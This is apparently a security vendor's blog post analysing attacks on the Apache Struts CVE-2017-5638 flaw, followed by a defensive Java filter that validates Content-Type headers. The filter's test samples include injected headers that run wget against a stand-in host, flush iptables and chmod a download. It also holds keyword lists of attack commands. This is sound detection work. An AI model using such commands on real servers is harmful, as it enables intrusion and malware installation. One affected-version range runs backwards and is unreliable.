Data Analysis of CVE-2017-5638 Exploit Attempts
A major vulnerability, the Apache Struts 2 0-Day vulnerability (CVE-2017-5638), was recently discovered on March 6, 2017. Here at NTT Security, we analyze these types of vulnerabilities, set up detection capabilities and analyze any exploit attempts by threat actors as detected via the NTT Security Global Managed Security Services Platform.
This blog takes a further look, via data analysis, into the active exploit attempts of the Apache Struts 2 0-Day vulnerability as seen in the NTT Security Global Managed Security Services Platform. Through our analysis, we were able to uncover the source of the attacks, industries targeted, malware samples, and more. Additionally, based on our research, we were able to conclude that exploit attempts for this vulnerability will remain popular for some time, and have listed mitigation and recommended actions further below in this blog to avoid future exploit attempts.
On March 6, Apache released a security advisory (S2-045) concerning a vulnerability (CVE-2017-5638) in Struts 2 which could allow remote code execution (RCE). On March 7, a security researcher released a proof of concept (PoC) on Github concerning an RCE attack using the Content-Type header of an HTTP request to an Apache Struts 2 server. The PoC abused the Apache Struts plugin, the Jakarta Multipart parser: when a file upload request carried crafted code inside the Content-Type header, the parser evaluated that code, allowing RCE.
Apache Struts 2 (CVE-2017-5638) Exploit Analysis
After discovery of the exploit, NTT Security analyzed our MSSP data to determine any exploit attempts. Below are basic statistics gathered from the MSSP data from March 9 - March 17.
Log Count: 8320
Event Count: 6194
Daily Average Count: 1040
Unique Attack Sources: 351
Unique Attack Source Countries: 13
Destination Ports: 80, 8080, 8011, 7253, 5000, 7219, 443, 9001, 8009, 7080, 8081, 4848, 14100, 9093
Industries Targeted: Education (37%), Technology (5%), Finance (4%), Healthcare (28%), State/Local/Federal Government (<1%), Non-Profit (<1%), Manufacturing (2%), Retail (15%), Business Services (6%), Construction/Real Estate (<1%), Food/Beverage (<1%), Gaming/Entertainment (<1%)
NTT Security noticed exploit attempts almost immediately after signatures were installed. In Figure 1 below, the log count shows a slight decline up to March 12 before it continues to gradually increase over time, sharply increasing on March 17.
Figure 1: CVE-2017-5638 Log Count Over Time
A large increase in exploit attempts was attributed to servers hosted in China as shown in Figure 2 and Figure 3. Analysis shows 76 percent of all exploit attempts originated from China.
Figure 2: Attack Source Map
Figure 3: Attack Source Over Time
A further look into China’s post-exploit intentions shows 69 percent attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. In some instances, wget was used but did not pull down any malicious binaries. These attempts allow the threat actors to track which servers are vulnerable and can later retrieve additional binaries located on remote servers. Below is an example HTTP GET request from a server in China.
Figure 4: Example of HTTP Request Exploiting CVE-2017-5638
Additionally, specific HTTP POST requests contained mainAction.action in the URI. These requests were only sent from specific China-based servers and each attempted to pull down Linux 32-bit and 64-bit malware as shown in Figure 4. MainAction() appears to be a class inside of Apache Struts responsible for preparing business objects for main.jsp. NTT Security determined that these requests were only coming from Chinese sources whose post-exploit intentions were to download malware over Post Office Protocol (POP) port 110. This activity could be used to bypass additional firewall rules. The malware names that NTT Security gathered ranged from UpTip60 through UpTip97. We triaged this information and were able to determine that the intended result of these exploit attempts is still underway.
Exploit Intentions – Reconnaissance
We determined post-exploit intentions were either to download malware, as shown in Figure 3, or for reconnaissance efforts. Reconnaissance accounted for 69 percent of all exploit attempts, but in a few instances threat actors were attempting to disable local firewalls and download malware. Several payloads indicated threat actors were attempting to use common Linux commands such as ifconfig, uname -r, echo and more. As stated previously, some of the payloads we analyzed attempted to use wget to retrieve a remote server page, which is believed to be used for tracking purposes, as there was no attempt to change the permissions of any downloaded binaries and there were no attempts to execute any local file. An example of this can be found in Figure 5.
Figure 5: Example of HTTP Request and wget Tracking
Exploit Intentions – Installation
As shown in Figure 4, several analyzed payloads showed attempts to disable local firewalls like iptables and SuSEfirewall2. If firewalls were successfully disabled, threat actors would then attempt to download malware from remote locations over specific ports. Malware hosts were located in the United States, China, and South Korea; however, as shown in Figure 6, exploit attempts that included malware installation attempts were sourced only from servers in China and the United States, suggesting the South Korean hosts were compromised servers. Further analysis of the data shows malware hosted in South Korea was being requested during exploit attempts from China. Figure 6 shows a bubble chart of the CVE-2017-5638 attack sources that attempted to pull down malware as well. Each bubble represents a remote malware host and the number of requests to it. As shown, Chinese sources attempted to pull malware from servers hosted in South Korea by the ISPs eHostIDC and KT Corporation.
Figure 6: Attack Source Country and Malware Correlation Chart. Each bubble represents the source of the attack and a unique malware host associated with it. The larger the bubble, the more malware retrieval attempts.
We were able to retrieve several malware samples which threat actors attempted to install on vulnerable systems. These samples ranged from PERL DDoS bots to 32-bit and 64-bit ELF binaries. While analyzing the sample with hash value e6408aa9db0a1e09c8028f87d3a8f0cf, it was apparent that a targeted list of IP addresses was hardcoded into the binary. These IP addresses were identified as a list of DNS servers leveraged for the DNS amplification capabilities of this sample. As shown in Figure 7, the functions are specific in their use and intentions, with names such as CAttackIe and CAttackIcmp. Analysis and triage of these malware samples were still being conducted at the time of this writing.
Figure 7: e6408aa9db0a1e09c8028f87d3a8f0cf Hardcoded IPs and Functions
After analysis, we expect exploit attempts against CVE-2017-5638 will continue because of the simplicity of the vulnerability, the popularity of the product and the ability to execute code remotely. Probing attempts in which threat actors use wget to test whether retrieving additional files is possible on vulnerable machines indicate that threat actors will be targeting the hosts identified that way sooner rather than later.
Affected Versions:
- Apache Struts versions 2.3.5 – 2.3.3
- Apache Struts versions 2.5.0 – 2.5.10
Figure 8: Snort Signatures
Mitigation and Recommended Actions:
- Upgrade to Struts 2.3.32 or Struts 2.5.10.1
- Implement a Servlet filter that validates the Content-Type header and discards requests whose value is suspicious, i.e. does not match multipart/form-data
- Change to a different multipart parser such as Pell or the parser from the Commons FileUpload library
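As an added example that is not NTT Security's or the Apache project's own code, the following Java Servlet filter implements the second recommendation above and also ties in the reconnaissance-versus-installation grouping used in the Exploit Intentions sections. It accepts a Content-Type header only when it parses as a plain MIME type with optional parameters (so a value carrying OGNL-style syntax such as `%{` can never pass), rejects everything else with HTTP 400, and tags the rejected header with an intent label derived from the commands quoted in this post (wget, iptables, SuSEfirewall2, ifconfig, uname, echo) so the log line can feed the kind of analysis described here. It assumes the javax.servlet API is on the classpath; the class name ContentTypeFilter, the method names, the keyword lists and the sample headers in main() are my own constructed choices, not values taken from the observed traffic.

```java
// Added example (not NTT Security's or Apache Struts' code). Assumes the
// javax.servlet API on the classpath and a web.xml / @WebFilter mapping.
import java.io.IOException;
import java.util.Locale;
import java.util.logging.Logger;
import java.util.regex.Pattern;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ContentTypeFilter implements Filter {
    private static final Logger LOG = Logger.getLogger(ContentTypeFilter.class.getName());

    // A legitimate Content-Type is "type/subtype" followed by optional
    // ";name=value" parameters. This is an allow-list grammar: anything with
    // expression syntax (braces, parentheses, quotes outside a parameter value)
    // fails to match and is rejected, whatever the payload text looks like.
    private static final Pattern VALID_MIME = Pattern.compile(
        "^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+"
        + "(\\s*;\\s*[A-Za-z0-9_.-]+=(\"[^\"]*\"|[^\\s;\"]+))*\\s*$");

    /** True when the header is absent or is syntactically a plain MIME type. */
    public static boolean isWellFormed(String contentType) {
        return contentType == null || VALID_MIME.matcher(contentType).matches();
    }

    /** Labels a rejected header the way this post groups post-exploit intent. */
    public static String classifyIntent(String contentType) {
        String ct = contentType.toLowerCase(Locale.ROOT);
        boolean fetches = ct.contains("wget") || ct.contains("curl");
        boolean disablesFirewall = ct.contains("iptables") || ct.contains("susefirewall2");
        boolean runsDownload = ct.contains("chmod");          // permission change = intent to execute
        if (disablesFirewall || (fetches && runsDownload)) {
            return "installation";                            // firewall off and/or fetch-then-execute
        }
        if (fetches || ct.contains("ifconfig") || ct.contains("uname")
                || ct.contains("echo") || ct.contains("whoami")) {
            return "reconnaissance";                          // wget without chmod = tracking probe
        }
        return "unknown";
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        String contentType = req.getContentType();
        if (!isWellFormed(contentType)) {
            HttpServletRequest httpReq = (HttpServletRequest) req;
            // Truncate the header in the log so a multi-kilobyte payload cannot flood it.
            String sample = contentType.length() > 200
                ? contentType.substring(0, 200) + "..." : contentType;
            LOG.warning("Rejected malformed Content-Type from " + httpReq.getRemoteAddr()
                + " uri=" + httpReq.getRequestURI()
                + " intent=" + classifyIntent(contentType) + " header=" + sample);
            ((HttpServletResponse) res).sendError(HttpServletResponse.SC_BAD_REQUEST);
            return;                                           // never reaches the Struts filter
        }
        chain.doFilter(req, res);
    }

    @Override public void init(FilterConfig config) {}
    @Override public void destroy() {}

    // Constructed sample headers (not real captured traffic) to exercise the checks.
    public static void main(String[] args) {
        String[] samples = {
            "multipart/form-data; boundary=----ConstructedBoundary123",
            "application/json;charset=utf-8",
            "%{#cmd='wget http://198.51.100.7/track'}",            // constructed, non-functional marker
            "%{#cmd='iptables -F; wget http://198.51.100.7/b; chmod +x b'}"
        };
        for (String s : samples) {
            System.out.println((isWellFormed(s) ? "accept  " : "reject  ")
                + (isWellFormed(s) ? "" : classifyIntent(s) + "  ") + s);
        }
    }
}
```

Map this filter ahead of StrutsPrepareAndExecuteFilter in web.xml: filter order follows declaration order, and the Jakarta parser reads the same Content-Type header once the request reaches Struts, so a validator declared after the Struts filter runs too late. The grammar is an allow-list rather than a list of known bad strings, so it does not need updating as payload encodings change, while the intent label only adds context to the log line and never decides whether the request is blocked.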